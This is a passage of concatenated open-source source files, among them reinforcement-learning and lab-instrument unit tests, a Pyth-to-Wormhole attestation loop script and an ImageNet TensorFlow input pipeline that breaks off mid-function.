s.to(d0, s[add_mul.ret_mul])
# within device move producer to consumer
s.to(c, s[add_mul.ret_mul],
s[add_mul.ret_add], depth=10)
# return tensor for inter-device move
# e0 = s.stream_to(e, hcl.CPU('riscv'))
# print(add_mul.ret_mul._buf, c._buf)
print(hcl.lower(s))
code = hcl.build(s, target)
print(code)
#
# with open("example.cl", "w") as f:
# f.write(code)
# f.close()
|
reagent/test/training/test_qrdqn.py | dmitryvinn/ReAgent | 1,156 | 21846 | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import unittest
import torch
from reagent.core.parameters import EvaluationParameters, RLParameters
from reagent.core.types import FeatureData, DiscreteDqnInput, ExtraData
from reagent.evaluation.evaluator import get_metrics_to_score
from reagent.models.dqn import FullyConnectedDQN
from reagent.training.parameters import QRDQNTrainerParameters
from reagent.training.qrdqn_trainer import QRDQNTrainer
from reagent.workflow.types import RewardOptions
class TestQRDQN(unittest.TestCase):
def setUp(self):
# preparing various components for qr-dqn trainer initialization
self.params = QRDQNTrainerParameters(actions=["1", "2"], num_atoms=11)
self.reward_options = RewardOptions()
self.metrics_to_score = get_metrics_to_score(
self.reward_options.metric_reward_values
)
self.state_dim = 10
self.action_dim = 2
self.sizes = [20, 20]
self.num_atoms = 11
self.activations = ["relu", "relu"]
self.dropout_ratio = 0
self.q_network = FullyConnectedDQN(
state_dim=self.state_dim,
action_dim=self.action_dim,
sizes=self.sizes,
num_atoms=self.num_atoms,
activations=self.activations,
dropout_ratio=self.dropout_ratio,
)
self.q_network_target = self.q_network.get_target_network()
self.x = FeatureData(float_features=torch.rand(5, 10))
self.eval_parameters = EvaluationParameters(calc_cpe_in_training=True)
self.num_output_nodes = (len(self.metrics_to_score) + 1) * len(
# pyre-fixme[16]: `QRDQNTrainerParameters` has no attribute `actions`.
self.params.actions
)
self.reward_network = FullyConnectedDQN(
state_dim=self.state_dim,
action_dim=self.num_output_nodes,
sizes=self.sizes,
activations=self.activations,
)
self.q_network_cpe = FullyConnectedDQN(
state_dim=self.state_dim,
action_dim=self.num_output_nodes,
sizes=self.sizes,
activations=self.activations,
)
self.q_network_cpe_target = self.q_network_cpe.get_target_network()
def _construct_trainer(self, new_params=None, no_cpe=False):
reward_network = self.reward_network
q_network_cpe = self.q_network_cpe
q_network_cpe_target = self.q_network_cpe_target
evaluation = self.eval_parameters
params = self.params
if new_params is not None:
params = new_params
if no_cpe:
reward_network = q_network_cpe = q_network_cpe_target = None
evaluation = EvaluationParameters(calc_cpe_in_training=False)
return QRDQNTrainer(
q_network=self.q_network,
q_network_target=self.q_network_target,
reward_network=reward_network,
q_network_cpe=q_network_cpe,
q_network_cpe_target=q_network_cpe_target,
metrics_to_score=self.metrics_to_score,
evaluation=evaluation,
# pyre-fixme[16]: `QRDQNTrainerParameters` has no attribute `asdict`.
**params.asdict()
)
def test_init(self):
trainer = self._construct_trainer()
quantiles = (0.5 + torch.arange(self.num_atoms).float()) / float(self.num_atoms)
self.assertTrue((torch.isclose(trainer.quantiles, quantiles)).all())
self.assertTrue((torch.isclose(trainer.reward_boosts, torch.zeros(2))).all())
param_copy = QRDQNTrainerParameters(
actions=["1", "2"],
num_atoms=11,
rl=RLParameters(reward_boost={"1": 1, "2": 2}),
)
reward_boost_trainer = self._construct_trainer(new_params=param_copy)
self.assertTrue(
(
torch.isclose(
reward_boost_trainer.reward_boosts, torch.tensor([1.0, 2.0])
)
).all()
)
def test_train_step_gen(self):
inp = DiscreteDqnInput(
state=FeatureData(float_features=torch.rand(3, 10)),
next_state=FeatureData(float_features=torch.rand(3, 10)),
reward=torch.ones(3, 1),
time_diff=torch.ones(3, 1) * 2,
step=torch.ones(3, 1) * 2,
not_terminal=torch.ones(3, 1), # todo: check terminal behavior
action=torch.tensor([[0, 1], [1, 0], [0, 1]]),
next_action=torch.tensor([[1, 0], [0, 1], [1, 0]]),
possible_actions_mask=torch.ones(3, 2),
possible_next_actions_mask=torch.ones(3, 2),
extras=ExtraData(),
)
mse_backward_type = type(
torch.nn.functional.mse_loss(
torch.tensor([1.0], requires_grad=True), torch.zeros(1)
).grad_fn
)
add_backward_type = type(
(
torch.tensor([1.0], requires_grad=True)
+ torch.tensor([1.0], requires_grad=True)
).grad_fn
)
mean_backward_type = type(
torch.tensor([1.0, 2.0], requires_grad=True).mean().grad_fn
)
# vanilla
trainer = self._construct_trainer()
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
self.assertEqual(type(losses[0].grad_fn), mean_backward_type)
self.assertEqual(type(losses[1].grad_fn), mse_backward_type)
self.assertEqual(type(losses[2].grad_fn), mse_backward_type)
self.assertEqual(type(losses[3].grad_fn), add_backward_type)
# no CPE
trainer = self._construct_trainer(no_cpe=True)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 2)
# seq_num
param_copy = QRDQNTrainerParameters(
actions=["1", "2"],
num_atoms=11,
rl=RLParameters(use_seq_num_diff_as_time_diff=True),
)
trainer = self._construct_trainer(new_params=param_copy)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
# multi_steps
param_copy = QRDQNTrainerParameters(
actions=["1", "2"], num_atoms=11, rl=RLParameters(multi_steps=2)
)
trainer = self._construct_trainer(new_params=param_copy)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
# non_max_q
param_copy = QRDQNTrainerParameters(
actions=["1", "2"], num_atoms=11, rl=RLParameters(maxq_learning=False)
)
trainer = self._construct_trainer(new_params=param_copy)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
def test_configure_optimizers(self):
trainer = self._construct_trainer()
optimizers = trainer.configure_optimizers()
self.assertEqual(len(optimizers), 4)
train_step_yield_order = [
trainer.q_network,
trainer.reward_network,
trainer.q_network_cpe,
trainer.q_network,
]
for i in range(len(train_step_yield_order)):
opt_param = optimizers[i]["optimizer"].param_groups[0]["params"][0]
loss_param = list(train_step_yield_order[i].parameters())[0]
self.assertTrue(torch.all(torch.isclose(opt_param, loss_param)))
trainer = self._construct_trainer(no_cpe=True)
optimizers = trainer.configure_optimizers()
self.assertEqual(len(optimizers), 2)
def test_get_detached_model_outputs(self):
trainer = self._construct_trainer()
q_out, q_target = trainer.get_detached_model_outputs(self.x)
self.assertEqual(q_out.shape[0], q_target.shape[0], 3)
self.assertEqual(q_out.shape[1], q_target.shape[1], 2)
|
qcodes/tests/test_sweep_values.py | riju-pal/QCoDeS_riju | 223 | 21853 | <filename>qcodes/tests/test_sweep_values.py
import pytest
from qcodes.instrument.parameter import Parameter
from qcodes.instrument.sweep_values import SweepValues
from qcodes.utils.validators import Numbers
@pytest.fixture(name='c0')
def _make_c0():
c0 = Parameter('c0', vals=Numbers(-10, 10), get_cmd=None, set_cmd=None)
yield c0
@pytest.fixture(name='c1')
def _make_c1():
c1 = Parameter('c1', get_cmd=None, set_cmd=None)
yield c1
@pytest.fixture(name='c2')
def _make_c2():
c2 = Parameter('c2', get_cmd=lambda: 42)
yield c2
def test_errors(c0, c1, c2):
# only complete 3-part slices are valid
with pytest.raises(TypeError):
c0[1:2] # For Int params this could be defined as step=1
with pytest.raises(TypeError):
c0[:2:3]
with pytest.raises(TypeError):
c0[1::3]
with pytest.raises(TypeError):
c0[:] # For Enum params we *could* define this one too...
# fails if the parameter has no setter
with pytest.raises(TypeError):
c2[0:0.1:0.01]
# validates every step value against the parameter's Validator
with pytest.raises(ValueError):
c0[5:15:1]
with pytest.raises(ValueError):
c0[5.0:15.0:1.0]
with pytest.raises(ValueError):
c0[-12]
with pytest.raises(ValueError):
c0[-5, 12, 5]
with pytest.raises(ValueError):
c0[-5, 12:8:1, 5]
# cannot combine SweepValues for different parameters
with pytest.raises(TypeError):
c0[0.1] + c1[0.2]
# improper use of extend
with pytest.raises(TypeError):
c0[0.1].extend(5)
# SweepValue object has no getter, even if the parameter does
with pytest.raises(AttributeError):
c0[0.1].get
def test_valid(c0):
c0_sv = c0[1]
# setter gets mapped
assert c0_sv.set == c0.set
# normal sequence operations access values
assert list(c0_sv) == [1]
assert c0_sv[0] == 1
assert 1 in c0_sv
assert not (2 in c0_sv)
# in-place and copying addition
c0_sv += c0[1.5:1.8:0.1]
c0_sv2 = c0_sv + c0[2]
assert list(c0_sv) == [1, 1.5, 1.6, 1.7]
assert list(c0_sv2) == [1, 1.5, 1.6, 1.7, 2]
# append and extend
c0_sv3 = c0[2]
# append only works with straight values
c0_sv3.append(2.1)
# extend can use another SweepValue, (even if it only has one value)
c0_sv3.extend(c0[2.2])
# extend can also take a sequence
c0_sv3.extend([2.3])
# as can addition
c0_sv3 += [2.4]
c0_sv4 = c0_sv3 + [2.5, 2.6]
assert list(c0_sv3) == [2, 2.1, 2.2, 2.3, 2.4]
assert list(c0_sv4) == [2, 2.1, 2.2, 2.3, 2.4, 2.5, 2.6]
# len
assert len(c0_sv3) == 5
# in-place and copying reverse
c0_sv.reverse()
c0_sv5 = reversed(c0_sv)
assert list(c0_sv) == [1.7, 1.6, 1.5, 1]
assert list(c0_sv5) == [1, 1.5, 1.6, 1.7]
# multi-key init, where first key is itself a list
c0_sv6 = c0[[1, 3], 4]
# copying
c0_sv7 = c0_sv6.copy()
assert list(c0_sv6) == [1, 3, 4]
assert list(c0_sv7) == [1, 3, 4]
assert not (c0_sv6 is c0_sv7)
def test_base():
p = Parameter('p', get_cmd=None, set_cmd=None)
with pytest.raises(NotImplementedError):
iter(SweepValues(p))
def test_snapshot(c0):
assert c0[0].snapshot() == {
'parameter': c0.snapshot(),
'values': [{'item': 0}]
}
assert c0[0:5:0.3].snapshot()['values'] == [{
'first': 0,
'last': 4.8,
'num': 17,
'type': 'linear'
}]
sv = c0.sweep(start=2, stop=4, num=5)
assert sv.snapshot()['values'] == [{
'first': 2,
'last': 4,
'num': 5,
'type': 'linear'
}]
# mixture of bare items, nested lists, and slices
sv = c0[1, 7, 3.2, [1, 2, 3], 6:9:1, -4.5, 5.3]
assert sv.snapshot()['values'] == [{
'first': 1,
'last': 5.3,
'min': -4.5,
'max': 8,
'num': 11,
'type': 'sequence'
}]
assert (c0[0] + c0[1]).snapshot()['values'] == [
{'item': 0},
{'item': 1}
]
assert (c0[0:3:1] + c0[4, 6, 9]).snapshot()['values'] == [
{'first': 0, 'last': 2, 'num': 3, 'type': 'linear'},
{'first': 4, 'last': 9, 'min': 4, 'max': 9, 'num': 3,
'type': 'sequence'}
]
def test_repr(c0):
sv = c0[0]
assert repr(sv) == (
f'<qcodes.instrument.sweep_values.SweepFixedValues: c0 at {id(sv)}>'
)
|
tools/SDKTool/src/WrappedDeviceAPI/deviceAPI/mobileDevice/android/plugin/Platform_plugin/PlatformWeTest/__init__.py | Passer-D/GameAISDK | 1,210 | 21855 | <reponame>Passer-D/GameAISDK<filename>tools/SDKTool/src/WrappedDeviceAPI/deviceAPI/mobileDevice/android/plugin/Platform_plugin/PlatformWeTest/__init__.py
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making GameAISDK available.
This source code file is licensed under the GNU General Public License Version 3.
For full details, please refer to the file "LICENSE.txt" which is provided as part of this source code package.
Copyright (C) 2020 THL A29 Limited, a Tencent company. All rights reserved.
"""
import platform
__is_windows_system = platform.platform().lower().startswith('window')
__is_linux_system = platform.platform().lower().startswith('linux')
if __is_windows_system:
from .demo_windows.PlatformWeTest import PlatformWeTest
from .demo_windows.common.AdbTool import AdbTool
elif __is_linux_system:
from .demo_ubuntu16.PlatformWeTest import PlatformWeTest
from .demo_ubuntu16.common.AdbTool import AdbTool
else:
raise Exception('system is not support!')
def GetInstance():
return PlatformWeTest()
|
t/unit/utils/test_div.py | kaiix/kombu | 1,920 | 21864 | <reponame>kaiix/kombu<gh_stars>1000+
import pickle
from io import BytesIO, StringIO
from kombu.utils.div import emergency_dump_state
class MyStringIO(StringIO):
def close(self):
pass
class MyBytesIO(BytesIO):
def close(self):
pass
class test_emergency_dump_state:
def test_dump(self, stdouts):
fh = MyBytesIO()
stderr = StringIO()
emergency_dump_state(
{'foo': 'bar'}, open_file=lambda n, m: fh, stderr=stderr)
assert pickle.loads(fh.getvalue()) == {'foo': 'bar'}
assert stderr.getvalue()
assert not stdouts.stdout.getvalue()
def test_dump_second_strategy(self, stdouts):
fh = MyStringIO()
stderr = StringIO()
def raise_something(*args, **kwargs):
raise KeyError('foo')
emergency_dump_state(
{'foo': 'bar'},
open_file=lambda n, m: fh,
dump=raise_something,
stderr=stderr,
)
assert 'foo' in fh.getvalue()
assert 'bar' in fh.getvalue()
assert stderr.getvalue()
assert not stdouts.stdout.getvalue()
|
release/stubs.min/System/Net/__init___parts/TransportContext.py | htlcnn/ironpython-stubs | 182 | 21866 | <filename>release/stubs.min/System/Net/__init___parts/TransportContext.py<gh_stars>100-1000
class TransportContext(object):
""" The System.Net.TransportContext class provides additional context about the underlying transport layer. """
def GetChannelBinding(self,kind):
"""
GetChannelBinding(self: TransportContext,kind: ChannelBindingKind) -> ChannelBinding
Retrieves the requested channel binding.
kind: The type of channel binding to retrieve.
Returns: The requested System.Security.Authentication.ExtendedProtection.ChannelBinding,or null if the
channel binding is not supported by the current transport or by the operating system.
"""
pass
def GetTlsTokenBindings(self):
""" GetTlsTokenBindings(self: TransportContext) -> IEnumerable[TokenBinding] """
pass
|
third_party/pyth/p2w_autoattest.py | dendisuhubdy/wormhole | 695 | 21880 | <reponame>dendisuhubdy/wormhole
#!/usr/bin/env python3
# This script sets up a simple loop for periodical attestation of Pyth data
from pyth_utils import *
from http.client import HTTPConnection
from http.server import HTTPServer, BaseHTTPRequestHandler
import json
import os
import re
import subprocess
import time
import threading
P2W_ADDRESS = "P2WH424242424242424242424242424242424242424"
P2W_ATTEST_INTERVAL = float(os.environ.get("P2W_ATTEST_INTERVAL", 5))
P2W_OWNER_KEYPAIR = os.environ.get(
"P2W_OWNER_KEYPAIR", f"/usr/src/solana/keys/p2w_owner.json")
P2W_ATTESTATIONS_PORT = int(os.environ.get("P2W_ATTESTATIONS_PORT", 4343))
PYTH_ACCOUNTS_HOST = "pyth"
PYTH_ACCOUNTS_PORT = 4242
WORMHOLE_ADDRESS = "Bridge1p5gheXUvJ6jGWGeCsgPKgnE3YgdGKRVCMY9o"
ATTESTATIONS = {
"pendingSeqnos": [],
}
class P2WAutoattestStatusEndpoint(BaseHTTPRequestHandler):
"""
A dumb endpoint for last attested price metadata.
"""
def do_GET(self):
print(f"Got path {self.path}")
sys.stdout.flush()
data = json.dumps(ATTESTATIONS).encode("utf-8")
print(f"Sending:\n{data}")
ATTESTATIONS["pendingSeqnos"] = []
self.send_response(200)
self.send_header("Content-Type", "application/json")
self.send_header("Content-Length", str(len(data)))
self.end_headers()
self.wfile.write(data)
self.wfile.flush()
def serve_attestations():
"""
Run a barebones HTTP server to share Pyth2wormhole attestation history
"""
server_address = ('', P2W_ATTESTATIONS_PORT)
httpd = HTTPServer(server_address, P2WAutoattestStatusEndpoint)
httpd.serve_forever()
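# The handler above dumps and then clears the pending list, so a GET on
# http://<host>:<P2W_ATTESTATIONS_PORT>/ returns JSON shaped like (sequence numbers assumed):
#   {"pendingSeqnos": [17, 18, 19]}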
# Get actor pubkeys
P2W_OWNER_ADDRESS = sol_run_or_die(
"address", ["--keypair", P2W_OWNER_KEYPAIR], capture_output=True).stdout.strip()
PYTH_OWNER_ADDRESS = sol_run_or_die(
"address", ["--keypair", PYTH_PROGRAM_KEYPAIR], capture_output=True).stdout.strip()
# Top up pyth2wormhole owner
sol_run_or_die("airdrop", [
str(SOL_AIRDROP_AMT),
"--keypair", P2W_OWNER_KEYPAIR,
"--commitment", "finalized",
], capture_output=True)
# Initialize pyth2wormhole
init_result = run_or_die([
"pyth2wormhole-client",
"--log-level", "4",
"--p2w-addr", P2W_ADDRESS,
"--rpc-url", SOL_RPC_URL,
"--payer", P2W_OWNER_KEYPAIR,
"init",
"--wh-prog", WORMHOLE_ADDRESS,
"--owner", P2W_OWNER_ADDRESS,
"--pyth-owner", PYTH_OWNER_ADDRESS,
], capture_output=True, die=False)
if init_result.returncode != 0:
print("NOTE: pyth2wormhole-client init failed, retrying with set_config")
run_or_die([
"pyth2wormhole-client",
"--log-level", "4",
"--p2w-addr", P2W_ADDRESS,
"--rpc-url", SOL_RPC_URL,
"--payer", P2W_OWNER_KEYPAIR,
"set-config",
"--owner", P2W_OWNER_KEYPAIR,
"--new-owner", P2W_OWNER_ADDRESS,
"--new-wh-prog", WORMHOLE_ADDRESS,
"--new-pyth-owner", PYTH_OWNER_ADDRESS,
], capture_output=True)
# Retrieve current price/product pubkeys from the pyth publisher
conn = HTTPConnection(PYTH_ACCOUNTS_HOST, PYTH_ACCOUNTS_PORT)
conn.request("GET", "/")
res = conn.getresponse()
pyth_accounts = None
if res.getheader("Content-Type") == "application/json":
pyth_accounts = json.load(res)
else:
print(f"Bad Content type {res.getheader('Content-Type')}", file=sys.stderr)
sys.exit(1)
price_addr = pyth_accounts["price"]
product_addr = pyth_accounts["product"]
nonce = 0
attest_result = run_or_die([
"pyth2wormhole-client",
"--log-level", "4",
"--p2w-addr", P2W_ADDRESS,
"--rpc-url", SOL_RPC_URL,
"--payer", P2W_OWNER_KEYPAIR,
"attest",
"--price", price_addr,
"--product", product_addr,
"--nonce", str(nonce),
], capture_output=True)
print("p2w_autoattest ready to roll.")
print(f"ACCOUNTS: {pyth_accounts}")
print(f"Attest Interval: {P2W_ATTEST_INTERVAL}")
# Serve p2w endpoint
endpoint_thread = threading.Thread(target=serve_attestations, daemon=True)
endpoint_thread.start()
# Let k8s know the service is up
readiness_thread = threading.Thread(target=readiness, daemon=True)
readiness_thread.start()
seqno_regex = re.compile(r"^Sequence number: (\d+)")
nonce = 1
while True:
attest_result = run_or_die([
"pyth2wormhole-client",
"--log-level", "4",
"--p2w-addr", P2W_ADDRESS,
"--rpc-url", SOL_RPC_URL,
"--payer", P2W_OWNER_KEYPAIR,
"attest",
"--price", price_addr,
"--product", product_addr,
"--nonce", str(nonce),
], capture_output=True)
time.sleep(P2W_ATTEST_INTERVAL)
matches = seqno_regex.match(attest_result.stdout)
if matches is not None:
seqno = int(matches.group(1))
print(f"Got seqno {seqno}")
ATTESTATIONS["pendingSeqnos"].append(seqno)
else:
        print("Warning: Could not get sequence number")
nonce += 1
readiness_thread.join()
|
milking_cowmask/data_sources/imagenet_data_source.py | deepneuralmachine/google-research | 23,901 | 21891 | <reponame>deepneuralmachine/google-research<gh_stars>1000+
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ImageNet input pipeline.
"""
import os
import pickle
import jax
import numpy as np
import tensorflow.compat.v1 as tf
import tensorflow_datasets as tfds
TRAIN_IMAGES = 1281167
TEST_IMAGES = 50000
MEAN_RGB = [0.485 * 255, 0.456 * 255, 0.406 * 255]
STDDEV_RGB = [0.229 * 255, 0.224 * 255, 0.225 * 255]
def normalize_image(image):
image -= tf.constant(MEAN_RGB, shape=[1, 1, 3], dtype=image.dtype)
image /= tf.constant(STDDEV_RGB, shape=[1, 1, 3], dtype=image.dtype)
return image
def random_crop(image,
min_object_covered=0.1,
aspect_ratio_range=(0.75, 1.33),
area_range=(0.05, 1.0),
max_attempts=100,):
"""Randomly crop an input image.
Args:
image: The image to be cropped.
min_object_covered: The minimal percentage of the target object that should
be in the final crop.
aspect_ratio_range: The cropped area of the image must have an aspect
ratio = width / height within this range.
area_range: The cropped area of the image must contain a fraction of the
input image within this range.
max_attempts: Number of attempts at generating a cropped region of the image
      that satisfies the specified constraints. After max_attempts failures,
the original image is returned.
Returns:
A random crop of the supplied image.
"""
bbox = tf.constant([0.0, 0.0, 1.0, 1.0], dtype=tf.float32, shape=[1, 1, 4])
sample_distorted_bounding_box = tf.image.sample_distorted_bounding_box(
tf.shape(image),
bounding_boxes=bbox,
min_object_covered=min_object_covered,
aspect_ratio_range=aspect_ratio_range,
area_range=area_range,
max_attempts=max_attempts,
use_image_if_no_bounding_boxes=True)
bbox_begin, bbox_size, _ = sample_distorted_bounding_box
offset_y, offset_x, _ = tf.unstack(bbox_begin)
target_height, target_width, _ = tf.unstack(bbox_size)
crop = tf.image.crop_to_bounding_box(image, offset_y, offset_x,
target_height, target_width)
return crop
def center_crop(image, image_size, crop_padding=32):
"""Crop an image in the center while preserving aspect ratio.
Args:
image: The image to be cropped.
image_size: the desired crop size.
crop_padding: minimal distance of the crop from the edge of the image.
Returns:
The center crop of the provided image.
"""
shape = tf.shape(image)
image_height = shape[0]
image_width = shape[1]
padded_center_crop_size = tf.cast(
((image_size / (image_size + crop_padding)) *
tf.cast(tf.minimum(image_height, image_width), tf.float32)),
tf.int32)
offset_height = ((image_height - padded_center_crop_size) + 1) // 2
offset_width = ((image_width - padded_center_crop_size) + 1) // 2
crop = tf.image.crop_to_bounding_box(image, offset_height, offset_width,
padded_center_crop_size,
padded_center_crop_size)
return crop
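# Worked example of the crop-size arithmetic above (input size assumed): for a 500x400
# image with image_size=224 and crop_padding=32,
#   padded_center_crop_size = int(224 / 256 * min(500, 400)) = int(0.875 * 400) = 350,
# so a centred 350x350 patch is taken and later resized to 224x224 by the caller.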
def colour_jitter(image, greyscale_prob=0.0):
"""Colour jitter augmentation.
Args:
image: The image to be augmented
greyscale_prob: probability of greyscale conversion
Returns:
Augmented image
"""
# Make sure it has 3 channels so random_saturation and random_hue don't
# fail on greyscale images
image = image * tf.ones([1, 1, 3], dtype=image.dtype)
if greyscale_prob > 0.0:
def f_grey():
return tf.image.rgb_to_grayscale(image)
def f_colour():
image_col = tf.image.random_saturation(image, 0.7, 1.4)
image_col = tf.image.random_hue(image_col, 0.1)
return image_col
p = tf.random.uniform([1])
image = tf.cond(tf.less(p[0], greyscale_prob), f_grey, f_colour)
else:
image = tf.image.random_saturation(image, 0.7, 1.4)
image = tf.image.random_hue(image, 0.1)
image = tf.image.random_contrast(image, 0.7, 1.4)
image = tf.image.random_brightness(image, 0.4)
return image
def preprocess_train_image(image, apply_colour_jitter=False,
greyscale_prob=0.0, image_size=224):
"""Preprocess a raw ImageNet image for training or evaluation.
Args:
image: The image to be preprocessed.
apply_colour_jitter: If True, apply colour jitterring.
greyscale_prob: Probability of converting image to greyscale.
image_size: The target size of the image.
Returns:
The pre-processed image.
"""
image = random_crop(image)
image = tf.image.resize([image],
[image_size, image_size],
method=tf.image.ResizeMethod.BICUBIC
)[0]
# Randomly flip the image horizontally.
image = tf.image.random_flip_left_right(image)
if apply_colour_jitter:
image = colour_jitter(image, greyscale_prob=greyscale_prob)
image = normalize_image(image)
return image
def preprocess_eval_image(image, image_size=224):
"""Preprocess a raw ImageNet image for training or evaluation.
Args:
image: The image to be preprocessed.
image_size: The target size of the image.
Returns:
The pre-processed image.
"""
image = center_crop(image, image_size)
image = tf.image.resize([image],
[image_size, image_size],
method=tf.image.ResizeMethod.BICUBIC
)[0]
image = normalize_image(image)
return image
_JPEG_ENCODED_FEATURE_DESCRIPTION = {
'label': tf.io.FixedLenFeature([], tf.int64, default_value=0),
'image': tf.io.FixedLenFeature([], tf.string),
'file_name': tf.io.FixedLenFeature([], tf.string),
}
def _filter_tfds_by_file_name(in_ds, subset_filenames):
kv_init = tf.lookup.KeyValueTensorInitializer(
np.array(subset_filenames), np.ones((len(subset_filenames),), dtype=int),
key_dtype=tf.string, value_dtype=tf.int64)
ht = tf.lookup.StaticHashTable(kv_init, 0)
def pred_fn(x):
return tf.equal(ht.lookup(x['file_name']), 1)
return in_ds.filter(pred_fn)
def _deserialize_and_decode_jpeg(serialized_sample):
sample = tf.io.parse_single_example(serialized_sample,
_JPEG_ENCODED_FEATURE_DESCRIPTION)
sample['image'] = tf.io.decode_jpeg(sample['image'])
return sample
def _deserialize_sample(serialized_sample):
return tf.io.parse_example(serialized_sample,
_JPEG_ENCODED_FEATURE_DESCRIPTION)
def _decode_jpeg(sample):
image = tf.io.decode_jpeg(sample['image'])
return dict(label=sample['label'], file_name=sample['file_name'], image=image)
def deserialize_and_decode_image_dataset(ds, batch_size):
if batch_size is not None and batch_size > 1:
return ds.batch(batch_size).map(
_deserialize_sample,
num_parallel_calls=tf.data.experimental.AUTOTUNE).unbatch().map(
_decode_jpeg, num_parallel_calls=tf.data.experimental.AUTOTUNE)
else:
return ds.map(_deserialize_and_decode_jpeg,
num_parallel_calls=tf.data.experimental.AUTOTUNE)
def _load_tfds_imagenet(split_name, n_total):
"""Load ImageNet from TFDS."""
split_size = float(n_total) // jax.host_count()
start = split_size * jax.host_id()
end = start + split_size
start_index = int(round(start))
end_index = int(round(end))
split = '{}[{}:{}]'.format(split_name, start_index, end_index)
return tfds.load('imagenet2012:5.*.*', split=split)
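# Sharding sketch (host layout assumed): with 4 hosts and the 50000-image validation split,
# host 1 gets split_size = 12500, start = 12500, end = 25000, i.e. it loads
# tfds.load('imagenet2012:5.*.*', split='validation[12500:25000]').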
def _load_custom_imagenet_split(split_path):
"""Load a custom split of the ImageNet dataset."""
if not tf.io.gfile.exists(split_path):
raise RuntimeError('Cannot find {}'.format(split_path))
shard_filenames = tf.io.gfile.listdir(split_path)
shard_filenames.sort()
if jax.host_count() > 1:
n_hosts = jax.host_count()
host_id = jax.host_id()
shard_filenames = [f for i, f in enumerate(shard_filenames)
if (i % n_hosts) == host_id]
files_in_split = [os.path.join(split_path, f) for f in shard_filenames]
ds = tf.data.TFRecordDataset(files_in_split, buffer_size=128 * 1024 * 1024,
num_parallel_reads=len(files_in_split))
# ds = deserialize_and_decode_image_dataset(ds, batch_size=256)
ds = deserialize_and_decode_image_dataset(ds, batch_size=1)
return ds
_SUP_PATH_PAT = r'{imagenet_subset_dir}/imagenet_{n_sup}_seed{subset_seed}'
_VAL_TVSPLIT_PATH_PAT = r'{imagenet_subset_dir}/imagenet_tv{n_val}s{val_seed}_split.pkl'
_VAL_PATH_PAT = r'{imagenet_subset_dir}/imagenet_tv{n_val}s{val_seed}_val'
_VAL_SUP_PATH_PAT = r'{imagenet_subset_dir}/imagenet_tv{n_val}s{val_seed}_{n_sup}_seed{subset_seed}'
class ImageNetDataSource(object):
"""ImageNet data source.
Attributes:
n_train: number of training samples
n_sup: number of supervised samples
n_val: number of validation samples
n_test: number of test samples
train_semisup_ds: Semi-supervised training dataset
train_unsup_ds: Unsupervised training dataset
train_sup_ds: Supervised training dataset
val_ds: Validation dataset
test_ds: Test dataset
n_classes: Number of classes
"""
def __init__(self, imagenet_subset_dir, n_val, n_sup, train_batch_size,
eval_batch_size, augment_twice, apply_colour_jitter=False,
greyscale_prob=0.0, load_test_set=True, image_size=224,
subset_seed=12345, val_seed=131):
if n_val == 0:
# We are using the complete ImageNet training set for traininig
# No samples are being held out for validation
# Draw unsupervised samples from complete training set
train_unsup_ds = _load_tfds_imagenet('train', TRAIN_IMAGES)
self.n_train = TRAIN_IMAGES
if n_sup == -1 or n_sup == TRAIN_IMAGES:
# All training samples are supervised
train_sup_ds = train_unsup_ds
self.n_sup = TRAIN_IMAGES
else:
sup_path = _SUP_PATH_PAT.format(
imagenet_subset_dir=imagenet_subset_dir, n_sup=n_sup,
subset_seed=subset_seed)
train_sup_ds = _load_custom_imagenet_split(sup_path)
self.n_sup = n_sup
val_ds = None
self.n_val = 0
else:
# A validation set has been requested
# Load the pickle file that tells us which file names are train / val
tvsplit_path = _VAL_TVSPLIT_PATH_PAT.format(
imagenet_subset_dir=imagenet_subset_dir, n_val=n_val,
val_seed=val_seed)
with tf.io.gfile.GFile(tvsplit_path, 'rb') as f_tvsplit:
tvsplit = pickle.load(f_tvsplit)
train_fn = tvsplit['train_fn']
# Filter the dataset to select samples in the training set
trainval_ds = _load_tfds_imagenet('train', TRAIN_IMAGES)
train_unsup_ds = _filter_tfds_by_file_name(trainval_ds, train_fn)
self.n_train = len(train_fn)
# Load the validation set from a custom dataset
val_path = _VAL_PATH_PAT.format(imagenet_subset_dir=imagenet_subset_dir,
n_val=n_val,
val_seed=val_seed)
val_ds = _load_custom_imagenet_split(val_path)
self.n_val = n_val
if n_sup == -1 or n_sup == len(train_fn):
# All training samples are supervised
train_sup_ds = train_unsup_ds
self.n_sup = len(train_fn)
else:
sup_path = _VAL_SUP_PATH_PAT.format(
imagenet_subset_dir=imagenet_subset_dir, n_val=n_val,
val_seed=val_seed, n_sup=n_sup,
subset_seed=subset_seed)
train_sup_ds = _load_custom_imagenet_split(sup_path)
self.n_sup = n_sup
train_sup_ds = train_sup_ds.repeat()
train_sup_ds = train_sup_ds.shuffle(8 * train_batch_size)
train_unsup_ds = train_unsup_ds.repeat()
train_unsup_ds = train_unsup_ds.shuffle(8 * train_batch_size)
train_semisup_ds = tf.data.Dataset.zip((train_sup_ds, train_unsup_ds))
def _augment_sup(sup_sample):
"""Augment supervised sample."""
sample = {
'sup_image': preprocess_train_image(
sup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
'sup_label': sup_sample['label'],
}
return sample
def _augment_unsup_once(unsup_sample):
"""Augment unsupervised sample, single augmentation."""
unsup_x0 = preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size)
sample = {
'unsup_image0': unsup_x0,
